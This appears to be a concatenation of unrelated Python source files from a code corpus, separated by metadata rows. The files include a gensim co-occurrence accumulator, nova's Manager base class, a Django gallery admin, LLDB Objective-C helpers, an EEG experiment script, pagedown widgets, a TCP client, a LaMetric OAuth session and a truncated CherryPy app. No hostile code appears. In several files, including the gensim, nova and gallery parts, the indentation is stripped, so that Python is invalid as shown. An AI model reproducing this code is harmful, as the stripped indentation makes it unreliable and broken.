super(ParallelWordOccurrenceAccumulator, self).__init__(*args)
if processes < 2:
raise ValueError(
"Must have at least 2 processes to run in parallel; got %d" % processes)
self.processes = processes
self.batch_size = kwargs.get('batch_size', 64)
def __str__(self):
return "%s(processes=%s, batch_size=%s)" % (
self.__class__.__name__, self.processes, self.batch_size)
def accumulate(self, texts, window_size):
workers, input_q, output_q = self.start_workers(window_size)
try:
self.queue_all_texts(input_q, texts, window_size)
interrupted = False
except KeyboardInterrupt:
            logger.warning("stats accumulation interrupted; <= %d documents processed", self._num_docs)
interrupted = True
accumulators = self.terminate_workers(input_q, output_q, workers, interrupted)
return self.merge_accumulators(accumulators)
def start_workers(self, window_size):
"""Set up an input and output queue and start processes for each worker.
Notes
-----
The input queue is used to transmit batches of documents to the workers.
The output queue is used by workers to transmit the WordOccurrenceAccumulator instances.
Parameters
----------
window_size : int
Returns
-------
        tuple
            (list of workers, input queue, output queue).
"""
input_q = mp.Queue(maxsize=self.processes)
output_q = mp.Queue()
workers = []
for _ in range(self.processes):
accumulator = PatchedWordOccurrenceAccumulator(self.relevant_ids, self.dictionary)
worker = AccumulatingWorker(input_q, output_q, accumulator, window_size)
worker.start()
workers.append(worker)
return workers, input_q, output_q
def yield_batches(self, texts):
"""Return a generator over the given texts that yields batches of `batch_size` texts at a time."""
batch = []
for text in self._iter_texts(texts):
batch.append(text)
if len(batch) == self.batch_size:
yield batch
batch = []
if batch:
yield batch
def queue_all_texts(self, q, texts, window_size):
"""Sequentially place batches of texts on the given queue until `texts` is consumed.
The texts are filtered so that only those with at least one relevant token are queued.
"""
for batch_num, batch in enumerate(self.yield_batches(texts)):
q.put(batch, block=True)
before = self._num_docs / self.log_every
self._num_docs += sum(len(doc) - window_size + 1 for doc in batch)
if before < (self._num_docs / self.log_every):
logger.info(
"%d batches submitted to accumulate stats from %d documents (%d virtual)",
(batch_num + 1), (batch_num + 1) * self.batch_size, self._num_docs)
def terminate_workers(self, input_q, output_q, workers, interrupted=False):
"""Wait until all workers have transmitted their WordOccurrenceAccumulator instances, then terminate each.
Warnings
--------
We do not use join here because it has been shown to have some issues
in Python 2.7 (and even in later versions). This method also closes both the input and output queue.
If `interrupted` is False (normal execution), a None value is placed on the input queue for
each worker. The workers are looking for this sentinel value and interpret it as a signal to
terminate themselves. If `interrupted` is True, a KeyboardInterrupt occurred. The workers are
programmed to recover from this and continue on to transmit their results before terminating.
So in this instance, the sentinel values are not queued, but the rest of the execution
continues as usual.
"""
if not interrupted:
for _ in workers:
input_q.put(None, block=True)
accumulators = []
while len(accumulators) != len(workers):
accumulators.append(output_q.get())
logger.info("%d accumulators retrieved from output queue", len(accumulators))
for worker in workers:
if worker.is_alive():
worker.terminate()
input_q.close()
output_q.close()
return accumulators
def merge_accumulators(self, accumulators):
"""Merge the list of accumulators into a single `WordOccurrenceAccumulator` with all
occurrence and co-occurrence counts, and a `num_docs` that reflects the total observed
by all the individual accumulators.
"""
accumulator = WordOccurrenceAccumulator(self.relevant_ids, self.dictionary)
for other_accumulator in accumulators:
accumulator.merge(other_accumulator)
# Workers do partial accumulation, so none of the co-occurrence matrices are symmetrized.
# This is by design, to avoid unnecessary matrix additions/conversions during accumulation.
accumulator._symmetrize()
logger.info("accumulated word occurrence stats for %d virtual documents", accumulator.num_docs)
return accumulator
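# The parallel accumulator yields the same counts as the serial one; a
# minimal sketch (illustrative only, not part of gensim; on platforms using
# the spawn start method this must run under a __main__ guard):
def _demo_parallel_accumulator():
    from gensim.corpora.dictionary import Dictionary
    texts = [['human', 'interface', 'computer'], ['survey', 'computer', 'system']]
    dictionary = Dictionary(texts)
    relevant_ids = {dictionary.token2id['human'], dictionary.token2id['computer']}
    accumulator = ParallelWordOccurrenceAccumulator(2, relevant_ids, dictionary)
    merged = accumulator.accumulate(texts, window_size=3)
    return merged.get_co_occurrences('human', 'computer')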
class AccumulatingWorker(mp.Process):
"""Accumulate stats from texts fed in from queue."""
def __init__(self, input_q, output_q, accumulator, window_size):
super(AccumulatingWorker, self).__init__()
self.input_q = input_q
self.output_q = output_q
self.accumulator = accumulator
self.accumulator.log_every = sys.maxsize # avoid logging in workers
self.window_size = window_size
def run(self):
try:
self._run()
except KeyboardInterrupt:
logger.info(
"%s interrupted after processing %d documents",
self.__class__.__name__, self.accumulator.num_docs)
except Exception:
logger.exception("worker encountered unexpected exception")
finally:
self.reply_to_master()
def _run(self):
batch_num = -1
n_docs = 0
while True:
batch_num += 1
docs = self.input_q.get(block=True)
if docs is None: # sentinel value
logger.debug("observed sentinel value; terminating")
break
self.accumulator.partial_accumulate(docs, self.window_size)
n_docs += len(docs)
logger.debug(
"completed batch %d; %d documents processed (%d virtual)",
batch_num, n_docs, self.accumulator.num_docs)
logger.debug(
"finished all batches; %d documents processed (%d virtual)",
n_docs, self.accumulator.num_docs)
def reply_to_master(self):
logger.info("serializing accumulator to return to master...")
self.output_q.put(self.accumulator, block=False)
logger.info("accumulator serialized")
class WordVectorsAccumulator(UsesDictionary):
"""Accumulate context vectors for words using word vector embeddings.
Attributes
----------
model: Word2Vec (:class:`~gensim.models.keyedvectors.KeyedVectors`)
If None, a new Word2Vec model is trained on the given text corpus. Otherwise,
it should be a pre-trained Word2Vec context vectors.
model_kwargs:
if model is None, these keyword arguments will be passed through to the Word2Vec constructor.
"""
def __init__(self, relevant_ids, dictionary, model=None, **model_kwargs):
super(WordVectorsAccumulator, self).__init__(relevant_ids, dictionary)
self.model = model
self.model_kwargs = model_kwargs
def not_in_vocab(self, words):
uniq_words = set(utils.flatten(words))
return set(word for word in uniq_words if word not in self.model.vocab)
def get_occurrences(self, word):
"""Return number of docs the word occurs in, once `accumulate` has been called."""
try:
self.token2id[word] # is this a token or an id?
except KeyError:
word = self.dictionary.id2token[word]
return self.model.vocab[word].count
def get_co_occurrences(self, word1, word2):
"""Return number of docs the words co-occur in, once `accumulate` has been called."""
raise NotImplementedError("Word2Vec model does not support co-occurrence counting")
def accumulate(self, texts, window_size):
if self.model is not None:
logger.debug("model is already trained; no accumulation necessary")
return self
kwargs = self.model_kwargs.copy()
if window_size is not None:
kwargs['window'] = window_size
kwargs['min_count'] = kwargs.get('min_count', 1)
kwargs['sg'] = kwargs.get('sg', 1)
        kwargs['hs'] = kwargs.get('hs', 0)
self.model = Word2Vec(**kwargs)
self.model.build_vocab(texts)
self.model.train(texts, total_examples=self.model.corpus_count, epochs=self.model.iter)
self.model = self.model.wv # retain KeyedVectors
return self
def ids_similarity(self, ids1, ids2):
words1 = self._words_with_embeddings(ids1)
words2 = self._words_with_embeddings(ids2)
return self.model.n_similarity(words1, words2)
def _words_with_embeddings(self, ids):
if not hasattr(ids, '__iter__'):
ids = [ids]
words = [self.dictionary.id2token[word_id] for word_id in ids]
return [word for word in words if word in self.model.vocab]
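# A short usage sketch (illustrative only, not part of gensim): train a tiny
# Word2Vec model on repeated toy sentences, then compare two word sets by
# embedding similarity.
def _demo_word_vectors_accumulator():
    from gensim.corpora.dictionary import Dictionary
    texts = [['human', 'interface', 'computer']] * 50
    dictionary = Dictionary(texts)
    relevant_ids = set(dictionary.token2id.values())
    accumulator = WordVectorsAccumulator(relevant_ids, dictionary, size=20)
    accumulator.accumulate(texts, window_size=2)
    return accumulator.ids_similarity(
        [dictionary.token2id['human']], [dictionary.token2id['computer']])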
|
lgpl-2.1
| -9,207,384,496,336,503,000 | 35.925532 | 114 | 0.619542 | false |
gaolichuang/py-task-framework
|
nova/manager.py
|
1
|
5055
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Base Manager class.
Managers are responsible for a certain aspect of the system. It is a logical
grouping of code relating to a portion of the system. In general other
components should be using the manager to make changes to the components that
it is responsible for.
For example, other components that need to deal with volumes in some way,
should do so by calling methods on the VolumeManager instead of directly
changing fields in the database. This allows us to keep all of the code
relating to volumes in the same place.
We have adopted a basic strategy of Smart managers and dumb data, which means
rather than attaching methods to data objects, components should call manager
methods that act on the data.
Methods on managers that can be executed locally should be called directly. If
a particular method must execute on a remote host, this should be done via rpc
to the service that wraps the manager
Managers should be responsible for most of the db access, and
non-implementation specific data. Anything implementation specific that can't
be generalized should be done by the Driver.
In general, we prefer to have one manager with multiple drivers for different
implementations, but sometimes it makes sense to have multiple managers. You
can think of it this way: Abstract different overall strategies at the manager
level(FlatNetwork vs VlanNetwork), and different implementations at the driver
level(LinuxNetDriver vs CiscoNetDriver).
Managers will often provide methods for initial setup of a host or periodic
tasks to a wrapping service.
This module provides Manager, a base class for managers.
"""
from oslo.config import cfg
from nova import baserpc
from nova.db import base
from nova import notifier
from nova.objects import base as objects_base
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import periodic_task
from nova.openstack.common.rpc import dispatcher as rpc_dispatcher
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
LOG = logging.getLogger(__name__)
class Manager(base.Base, periodic_task.PeriodicTasks):
# Set RPC API version to 1.0 by default.
RPC_API_VERSION = '1.0'
def __init__(self, host=None, db_driver=None, service_name='undefined'):
if not host:
host = CONF.host
self.host = host
self.backdoor_port = None
self.service_name = service_name
self.notifier = notifier.get_notifier(self.service_name, self.host)
super(Manager, self).__init__(db_driver)
def create_rpc_dispatcher(self, backdoor_port=None, additional_apis=None):
'''Get the rpc dispatcher for this manager.
If a manager would like to set an rpc API version, or support more than
one class as the target of rpc messages, override this method.
'''
apis = []
if additional_apis:
apis.extend(additional_apis)
base_rpc = baserpc.BaseRPCAPI(self.service_name, backdoor_port)
apis.extend([self, base_rpc])
serializer = objects_base.NovaObjectSerializer()
return rpc_dispatcher.RpcDispatcher(apis, serializer)
def periodic_tasks(self, context, raise_on_error=False):
"""Tasks to be run at a periodic interval."""
return self.run_periodic_tasks(context, raise_on_error=raise_on_error)
def init_host(self):
"""Hook to do additional manager initialization when one requests
the service be started. This is called before any service record
is created.
Child classes should override this method.
"""
pass
def pre_start_hook(self):
"""Hook to provide the manager the ability to do additional
start-up work before any RPC queues/consumers are created. This is
called after other initialization has succeeded and a service
record is created.
Child classes should override this method.
"""
pass
def post_start_hook(self):
"""Hook to provide the manager the ability to do additional
start-up work immediately after a service creates RPC consumers
and starts 'running'.
Child classes should override this method.
"""
pass
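# A minimal illustrative subclass (not part of nova; the names are
# hypothetical). It shows the intended pattern: RPC-callable manager methods
# take the request context as their first argument, and periodic work is
# marked with the periodic_task decorator so periodic_tasks() will run it.
class ExampleManager(Manager):
    def example_method(self, context, value):
        LOG.debug(_("example_method called with %s"), value)
        return value
    @periodic_task.periodic_task
    def _example_periodic_task(self, context):
        LOG.debug(_("example periodic task ran"))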
|
apache-2.0
| -5,186,284,612,501,895,000 | 37.295455 | 79 | 0.726607 | false |
codefisher/djangopress
|
djangopress/gallery/admin.py
|
1
|
4575
|
from .models import GallerySection, Image, GALLERY_SETTINGS, Thumber
from django.contrib import admin
from django import forms
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.urls import reverse
try:
from tinymce import widgets as tinymce_widgets
except ImportError:
tinymce_widgets = None
class GalleryAdminForm(forms.ModelForm):
class Meta:
model = GallerySection
if tinymce_widgets:
widgets = {
'description': tinymce_widgets.AdminTinyMCE,
}
exclude = ()
class ImageAdminForm(forms.ModelForm):
class Meta(object):
model = Image
widgets = {
'description': forms.TextInput
}
exclude = ()
class ImageInline(admin.StackedInline):
model = Image
form = ImageAdminForm
extra = 1
min_num = 0
class ThumbnailForm(forms.Form):
_selected_action = forms.CharField(widget=forms.MultipleHiddenInput)
sizes = GALLERY_SETTINGS.get("sizes").get("thumb")
width = forms.IntegerField(initial=sizes.get('width'))
height = forms.IntegerField(initial=sizes.get('height'))
class GalleryAdmin(admin.ModelAdmin):
inlines = [ImageInline]
prepopulated_fields = {
"slug": ("title", )
}
fieldsets = (
(None, {
'fields': ('title', 'slug', 'description')
}),
("options", {
'fields': ('position', 'listed')
}),
)
actions = ['as_html']
form = GalleryAdminForm
list_display = ('text_title', 'position')
list_editable = ('position', )
ordering = ('position', 'title')
def as_html(self, request, queryset):
form = None
thumber = None
if 'apply' in request.POST:
form = ThumbnailForm(request.POST)
if form.is_valid():
thumber = Thumber(form.cleaned_data['width'], form.cleaned_data['height'])
if not form:
form = ThumbnailForm(initial={'_selected_action': request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'gallery/admin_gallery_as_html.html', {
'title': "Gallery as HTML",
'gallery_form': form,
'thumber': thumber,
'galleries': queryset,
'location': request.get_full_path,
})
admin.site.register(GallerySection, GalleryAdmin)
class MoveGalleryForm(forms.Form):
_selected_action = forms.CharField(widget=forms.MultipleHiddenInput)
gallery = forms.ModelChoiceField(GallerySection.objects, required=False)
class ImageAdmin(admin.ModelAdmin):
list_display = ('thumb', 'image', 'gallery', 'description')
list_filter = ('gallery',)
actions = ['change_gallery', 'as_html']
def change_gallery(self, request, queryset):
form = None
if 'apply' in request.POST:
form = MoveGalleryForm(request.POST)
if form.is_valid():
gallery = form.cleaned_data['gallery']
queryset.update(gallery=gallery)
if gallery:
self.message_user(request, "Moved images to gallery: {}.".format(gallery.title))
else:
self.message_user(request, "Removed images from gallery.")
return HttpResponseRedirect(request.get_full_path())
if not form:
form = MoveGalleryForm(initial={'_selected_action': request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'gallery/admin_change_gallery.html', {
'title': 'Change Image Gallery',
'images': queryset,
'gallery_form': form,
})
def as_html(self, request, queryset):
form = None
thumber = None
if 'apply' in request.POST:
form = ThumbnailForm(request.POST)
if form.is_valid():
thumber = Thumber(form.cleaned_data['width'], form.cleaned_data['height'])
if not form:
form = ThumbnailForm(initial={'_selected_action': request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'gallery/admin_images_as_html.html', {
'title': "Images as HTML",
'gallery_form': form,
'thumber': thumber,
'images': queryset,
'location': request.get_full_path,
})
def thumb(self, obj):
if obj.thumbnail:
return '<img src="{}">'.format(obj.thumbnail)
return obj.image
thumb.allow_tags = True
admin.site.register(Image, ImageAdmin)
|
mit
| -9,221,700,838,383,901,000 | 31.913669 | 114 | 0.60153 | false |
zats/chisel
|
fblldbobjcruntimehelpers.py
|
1
|
3268
|
#!/usr/bin/python
# Copyright (c) 2014, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import re
import lldb
import fblldbbase as fb
def objc_getClass(className):
command = '(void*)objc_getClass("{}")'.format(className)
value = fb.evaluateExpression(command)
return value
def object_getClass(object):
command = '(void*)object_getClass({})'.format(object)
value = fb.evaluateExpression(command)
return value
def class_getName(klass):
command = '(const char*)class_getName((Class){})'.format(klass)
value = fb.evaluateExpressionValue(command).GetSummary().strip('"')
return value
def class_getSuperclass(klass):
command = '(void*)class_getSuperclass((Class){})'.format(klass)
value = fb.evaluateExpression(command)
return value
def class_isMetaClass(klass):
command = 'class_isMetaClass((Class){})'.format(klass)
return fb.evaluateBooleanExpression(command)
def class_getInstanceMethod(klass, selector):
command = '(void*)class_getInstanceMethod((Class){}, @selector({}))'.format(klass, selector)
value = fb.evaluateExpression(command)
return value
def currentArch():
targetTriple = lldb.debugger.GetSelectedTarget().GetTriple()
arch = targetTriple.split('-')[0]
if arch == 'x86_64h':
arch = 'x86_64'
return arch
def functionPreambleExpressionForSelf():
arch = currentArch()
expressionForSelf = None
if arch == 'i386':
expressionForSelf = '*(id*)($esp+4)'
elif arch == 'x86_64':
expressionForSelf = '(id)$rdi'
elif arch == 'arm64':
expressionForSelf = '(id)$x0'
elif re.match(r'^armv.*$', arch):
expressionForSelf = '(id)$r0'
return expressionForSelf
def functionPreambleExpressionForObjectParameterAtIndex(parameterIndex):
  arch = currentArch()
  expression = None
  if arch == 'i386':
    expression = '*(id*)($esp + ' + str(12 + parameterIndex * 4) + ')'
  elif arch == 'x86_64':
    if parameterIndex > 3:
      raise Exception("Current implementation can not return object at index greater than 3 for x86_64")
    registersList = ['rdx', 'rcx', 'r8', 'r9']
    expression = '(id)$' + registersList[parameterIndex]
  elif arch == 'arm64':
    if parameterIndex > 5:
      raise Exception("Current implementation can not return object at index greater than 5 for arm64")
    expression = '(id)$x' + str(parameterIndex + 2)
  elif re.match(r'^armv.*$', arch):
    if parameterIndex > 1:
      raise Exception("Current implementation can not return object at index greater than 1 for arm32")
    expression = '(id)$r' + str(parameterIndex + 2)
  return expression
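# An illustrative helper (not part of chisel; assumes it is called while
# stopped at the start of an Objective-C method): print the description of
# the object argument at the given index using the preamble expression above.
def printObjectParameterAtIndex(parameterIndex):
  expression = functionPreambleExpressionForObjectParameterAtIndex(parameterIndex)
  value = fb.evaluateExpressionValue(expression)
  print(value.GetObjectDescription())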
def isMacintoshArch():
arch = currentArch()
if not arch == 'x86_64':
return False
nsClassName = 'NSApplication'
command = '(void*)objc_getClass("{}")'.format(nsClassName)
return (fb.evaluateBooleanExpression(command + '!= nil'))
def isIOSSimulator():
return fb.evaluateExpressionValue('(id)[[UIDevice currentDevice] model]').GetObjectDescription().lower().find('simulator') >= 0
def isIOSDevice():
return not isMacintoshArch() and not isIOSSimulator()
|
bsd-3-clause
| 9,142,473,489,079,375,000 | 31.68 | 129 | 0.701652 | false |
yaricom/brainhash
|
src/experiment_cA4_dt_th_al_ah_bl_mc_signal_7.py
|
1
|
1887
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
The experiment with 10 Hz/5Hz, wisp, attention, 70, cA 4, delta, theta, alpha low, alpha high, beta low, batch size = 5 and
multiclass data set (BALANCED) with signal only data
@author: yaric
"""
import experiment as ex
import config
from time import time
n_hidden = 4
batch_size = 5
max_cls_samples = 7
experiment_name = 'cA_%d_%d_dt-th-a_l-a_h-b_l-b_h_mc_signal_%d' % (n_hidden, batch_size, max_cls_samples) # will be used as parent dir for analyzer results
# The sample records identifiers
signal_ids = ['IO_10_2', 'KS_10_2', 'RO_10_2']
class_lbs = ['IO', 'KS', 'RO']
noise_ids = ['noise']
# Setup analyzer configuration
analyzer_config = ex.defaultAnalyzerConfig()
analyzer_config['batch_size'] = batch_size
analyzer_config['learning_rate'] = 0.1
analyzer_config['n_hidden'] = n_hidden
analyzer_config['training_epochs'] = 50000
analyzer_config['encoder'] = 'cA'
analyzer_config['bands'] = 'delta,theta,alpha_l,alpha_h,beta_l'
start = time()
#
# Run analyzer
#
print("\nStart analysis with parameters:\n%s\n" % analyzer_config)
print("Start analysis for signal records: %s" % signal_ids)
ex.runEEGAnalyzerWithIDs(ids_list=signal_ids,
experiment_name=experiment_name,
a_config=analyzer_config)
#
# Run classifiers
#
signal_dir = "%s/%s" % (config.analyzer_out_dir, experiment_name)
out_suffix = experiment_name
print("Run classifiers over analyzed records. \nSignal dir: %s"
% (signal_dir))
ex.runSignalsOnlyClassifier(signal_dir=signal_dir,
signal_records=signal_ids,
out_suffix=out_suffix,
signal_class_labels=class_lbs,
max_cls_samples=max_cls_samples)
print("\n\nExperiment %s took %.2f seconds.\n"
% (experiment_name, time() - start))
|
gpl-3.0
| 8,388,471,490,210,353,000 | 28.968254 | 155 | 0.647059 | false |
DMOJ/site
|
judge/widgets/pagedown.py
|
1
|
3741
|
from django.contrib.admin import widgets as admin_widgets
from django.forms.utils import flatatt
from django.template.loader import get_template
from django.utils.encoding import force_text
from django.utils.html import conditional_escape
from judge.widgets.mixins import CompressorWidgetMixin
__all__ = ['PagedownWidget', 'AdminPagedownWidget',
'MathJaxPagedownWidget', 'MathJaxAdminPagedownWidget',
'HeavyPreviewPageDownWidget', 'HeavyPreviewAdminPageDownWidget']
try:
from pagedown.widgets import PagedownWidget as OldPagedownWidget
except ImportError:
PagedownWidget = None
AdminPagedownWidget = None
MathJaxPagedownWidget = None
MathJaxAdminPagedownWidget = None
HeavyPreviewPageDownWidget = None
HeavyPreviewAdminPageDownWidget = None
else:
class PagedownWidget(CompressorWidgetMixin, OldPagedownWidget):
# The goal here is to compress all the pagedown JS into one file.
        # We do not want any further compression down the chain, because
        # 1. we'd be creating multiple large JS files to download.
# 2. this is not a problem here because all the pagedown JS files will be used together.
compress_js = True
def __init__(self, *args, **kwargs):
kwargs.setdefault('css', ('pagedown_widget.css',))
super(PagedownWidget, self).__init__(*args, **kwargs)
class AdminPagedownWidget(PagedownWidget, admin_widgets.AdminTextareaWidget):
class Media:
css = {'all': [
'content-description.css',
'admin/css/pagedown.css',
]}
js = ['admin/js/pagedown.js']
class MathJaxPagedownWidget(PagedownWidget):
class Media:
js = [
'mathjax_config.js',
'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML',
'pagedown_math.js',
]
class MathJaxAdminPagedownWidget(AdminPagedownWidget, MathJaxPagedownWidget):
pass
class HeavyPreviewPageDownWidget(PagedownWidget):
def __init__(self, *args, **kwargs):
kwargs.setdefault('template', 'pagedown.html')
self.preview_url = kwargs.pop('preview')
self.preview_timeout = kwargs.pop('preview_timeout', None)
self.hide_preview_button = kwargs.pop('hide_preview_button', False)
super(HeavyPreviewPageDownWidget, self).__init__(*args, **kwargs)
def render(self, name, value, attrs=None, renderer=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, {'name': name})
if 'class' not in final_attrs:
final_attrs['class'] = ''
final_attrs['class'] += ' wmd-input'
return get_template(self.template).render(self.get_template_context(final_attrs, value))
def get_template_context(self, attrs, value):
return {
'attrs': flatatt(attrs),
'body': conditional_escape(force_text(value)),
'id': attrs['id'],
'show_preview': self.show_preview,
'preview_url': self.preview_url,
'preview_timeout': self.preview_timeout,
'extra_classes': 'dmmd-no-button' if self.hide_preview_button else None,
}
class Media:
css = {'all': ['dmmd-preview.css']}
js = ['dmmd-preview.js']
class HeavyPreviewAdminPageDownWidget(AdminPagedownWidget, HeavyPreviewPageDownWidget):
class Media:
css = {'all': [
'pygment-github.css',
'table.css',
'ranks.css',
]}
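# A brief usage sketch (illustrative only; the form and the 'comment_preview'
# URL name are hypothetical): wire the heavy-preview widget into a Django form.
if HeavyPreviewPageDownWidget is not None:
    from django import forms as example_forms
    from django.urls import reverse_lazy
    class ExampleCommentForm(example_forms.Form):
        body = example_forms.CharField(
            widget=HeavyPreviewPageDownWidget(preview=reverse_lazy('comment_preview')))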
|
agpl-3.0
| -7,868,084,420,352,699,000 | 37.96875 | 111 | 0.615878 | false |
InzamamRahaman/simple-tcp-example
|
client/TcpClient.py
|
1
|
1334
|
import socket
class TcpClient(object):
def __init__(self, port, host):
"""
Constructor for TCP Client
:param port: the port that the client is going to try and access on the server
:param host: the host of the sever
"""
self.port = port
self.host = host
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connect(self):
"""
Connects to the server and initiates interactions
:return: None
"""
self.sock.connect((self.host, self.port))
self.interact_with_server()
def interact_with_server(self):
"""
Handles interaction with the server
:return: None
"""
message_size = 1024
block_message = 'You are not allowed to use this server!'
server_message = self.sock.recv(message_size)
print server_message
if server_message != block_message:
client_message = raw_input('Please enter a sentence:')
print 'You entered ', client_message
self.sock.send(client_message)
server_message = self.sock.recv(message_size)
print 'And received ', server_message
self.sock.close()
else:
print 'You have been blocked'
self.sock.close()
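# A brief usage sketch (illustrative; the port and host are placeholders and
# must match a running TCP server):
if __name__ == '__main__':
    client = TcpClient(12000, 'localhost')
    client.connect()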
|
mit
| -5,169,483,261,950,526,000 | 29.318182 | 86 | 0.577211 | false |
keans/lmnotify
|
lmnotify/session.py
|
1
|
3431
|
import sys
from abc import ABCMeta, abstractmethod
import requests
from oauthlib.oauth2 import BackendApplicationClient
from requests_oauthlib import OAuth2Session
from .const import CLOUD_URLS
class Session(object):
"""
abstract class as base for sessions
"""
__metaclass__ = ABCMeta
def __init__(self):
self._session = None
@property
def session(self):
"""
property to access the session
(will be created on first access)
"""
if self._session is None:
self.init_session()
return self._session
@abstractmethod
def init_session(self):
"""
will automatically be called, when the session property
is accessed for the first time
"""
pass
@abstractmethod
def is_configured(self):
"""
must return True, when the session is ready to use
"""
pass
class LocalSession(Session):
"""
local session that directly communicates with the LaMetric device
without using the Cloud-API
(note: you need to register once using CloudAuth before the local
authentication can be used)
"""
def __init__(self):
Session.__init__(self)
def init_session(self):
"""
init the local session
"""
self._session = requests.Session()
def is_configured(self):
"""
local session is always configured
"""
return True
class CloudSession(Session):
"""
cloud session that uses authentication via OAuth2 with the LaMetric Cloud
"""
def __init__(
self, client_id=None, client_secret=None
):
Session.__init__(self)
# either use given credentials or get them from env variables
self.set_credentials(client_id, client_secret)
def set_credentials(self, client_id=None, client_secret=None):
"""
set given credentials and reset the session
"""
self._client_id = client_id
self._client_secret = client_secret
# make sure to reset session due to credential change
self._session = None
def is_configured(self):
"""
returns True, if cloud session is configured
"""
return self._session is not None
def init_session(self, get_token=True):
"""
init a new oauth2 session that is required to access the cloud
:param bool get_token: if True, a token will be obtained, after
the session has been created
"""
if (self._client_id is None) or (self._client_secret is None):
sys.exit(
"Please make sure to set the client id and client secret "
"via the constructor, the environment variables or the config "
"file; otherwise, the LaMetric cloud cannot be accessed. "
"Abort!"
)
self._session = OAuth2Session(
client=BackendApplicationClient(client_id=self._client_id)
)
if get_token is True:
# get oauth token
self.get_token()
def get_token(self):
"""
get current oauth token
"""
self.token = self._session.fetch_token(
token_url=CLOUD_URLS["get_token"][1],
client_id=self._client_id,
client_secret=self._client_secret
)
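# A short usage sketch (illustrative only; the credentials are placeholders):
if __name__ == "__main__":
    local = LocalSession()
    assert local.is_configured()  # local sessions need no credentials
    cloud = CloudSession(client_id="my-id", client_secret="my-secret")
    # accessing cloud.session would create the OAuth2 session and fetch a token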
|
mit
| -1,433,962,306,390,378,000 | 25.596899 | 79 | 0.583795 | false |
40223226/2015cdbg8_6-22
|
wsgi.py
|
1
|
39822
|
#@+leo-ver=5-thin
#@+node:2014fall.20141212095015.1775: * @file wsgi.py
# coding=utf-8
# 上面的程式內容編碼必須在程式的第一或者第二行才會有作用
################# (1) 模組導入區
# 導入 cherrypy 模組, 為了在 OpenShift 平台上使用 cherrypy 模組, 必須透過 setup.py 安裝
#@@language python
#@@tabwidth -4
#@+<<declarations>>
#@+node:2014fall.20141212095015.1776: ** <<declarations>> (wsgi)
import cherrypy
# import Python's built-in os module; since os is built in, no setup.py installation is needed
import os
# import the random module
import random
# import the gear module
import gear
################# (2) global variable setup
# determine the directory containing this program file (with a trailing backslash on Windows)
_curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
# set the data storage directories for cloud and local execution
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
    # the program is running in the cloud
    download_root_dir = os.environ['OPENSHIFT_DATA_DIR']
    data_dir = os.environ['OPENSHIFT_DATA_DIR']
else:
    # the program is running locally
    download_root_dir = _curdir + "/local_data/"
data_dir = _curdir + "/local_data/"
'''The following is local code using input() and a for loop; to send the program to OpenShift, besides adopting the CherryPy web framework, the printing must be converted to html output
# the data type obtained from input() is a string
toprint = input("What content should be printed?")
# to use the string obtained from input() as an integer, convert it with int()
repeat_no = int(input("How many times should it repeat?"))
for i in range(repeat_no):
    print(toprint)
'''
#@-<<declarations>>
#@+others
#@+node:2014fall.20141212095015.1777: ** class Hello
################# (3) class definitions
# from here on the program uses the CherryPy web framework structure
# below is the design of the Hello class; inheriting from object gives Hello all of object's features, including its methods and attributes
class Hello(object):
    # startup configuration for the Hello class
_cp_config = {
'tools.encode.encoding': 'utf-8',
'tools.sessions.on' : True,
'tools.sessions.storage_type' : 'file',
#'tools.sessions.locking' : 'explicit',
    # sessions are stored as files, under the tmp directory inside data_dir
    'tools.sessions.storage_path' : data_dir+'/tmp',
    # the session lifetime is set to 60 minutes
'tools.sessions.timeout' : 60
}
#@+others
#@+node:2014fall.20141212095015.2004: *3* __init__
def __init__(self):
        # create the required directories when the class is instantiated
if not os.path.isdir(data_dir+'/tmp'):
os.mkdir(data_dir+'/tmp')
if not os.path.isdir(data_dir+"/downloads"):
os.mkdir(data_dir+"/downloads")
if not os.path.isdir(data_dir+"/images"):
os.mkdir(data_dir+"/images")
#@+node:2014fall.20141212095015.1778: *3* index_orig
    # the cherrypy.expose decorator marks the method below as directly executable by users via a URL
    @cherrypy.expose
    # index is the default method of a CherryPy class; it runs when the user specifies no method in the URL
    # methods taking self are class member methods; Python passes the object's state between them via self
def index_orig(self, toprint="Hello World!"):
return toprint
#@+node:2014fall.20141212095015.1779: *3* hello
@cherrypy.expose
def hello(self, toprint="Hello World!"):
return toprint
#@+node:2014fall.20141215194146.1791: *3* index
@cherrypy.expose
def index(self):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<h1>Final exam practice 1</h1>
<h2>40223226</h2>
<h2>張政皓</h2>
<a href="drawspur">drawgear2</a>(draw two gears)<br />
'''
return outstring
#@+node:2015.20150330144929.1713: *3* twoDgear
@cherrypy.expose
    # N is the number of teeth, M the module, P the pressure angle
def twoDgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
